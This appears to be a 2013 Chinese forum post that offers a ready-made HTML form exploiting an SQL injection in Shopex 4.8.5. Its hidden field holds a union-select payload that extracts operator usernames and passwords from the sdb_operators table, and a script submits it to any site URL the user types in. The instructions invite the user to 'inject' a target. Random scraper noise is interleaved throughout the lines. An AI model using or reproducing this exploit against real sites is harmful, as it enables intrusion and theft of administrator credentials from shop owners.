<center>) e- N1 r0 \- i! T+ d
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>5 x* h+ b: h; o8 T! E# S+ b
<form action="" method="post" name="submit_url">. F/ j# B' L9 g3 c: O c
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
+ N3 |1 Y. B8 U5 M7 w<input type="hidden" name="goods[goods_id]" value="3">
9 P% [; A1 V( e' d. X" [4 |<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
( }, w4 h0 i: J; S U<input type="submit" value="给我注入" onclick=fsubmit()>
" P" x& U0 R7 u</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com; z. r7 z# A) ?# S* B6 o' w# F1 v
, N4 W4 h: H- ^- g3 j<script> 2 w1 X5 K$ v, J) y8 L8 n% T
function fsubmit(){ / S' _! k, _) E( d t
form = document.forms[0]; * s+ Y( V( B8 [. u
form.action = form.url.value+'/?product-gnotify';
+ ?2 z2 L/ V) c3 w. S' Yform.submit();
8 {! D1 @# v+ C L9 l9 k# p( @3 E. _} 2 j/ j6 b; _' k, D5 C7 J9 j8 r
</script>; L- ^8 }% q. m( b% n" g
|
发表于 2013-1-23 09:20:52
收藏
支持
反对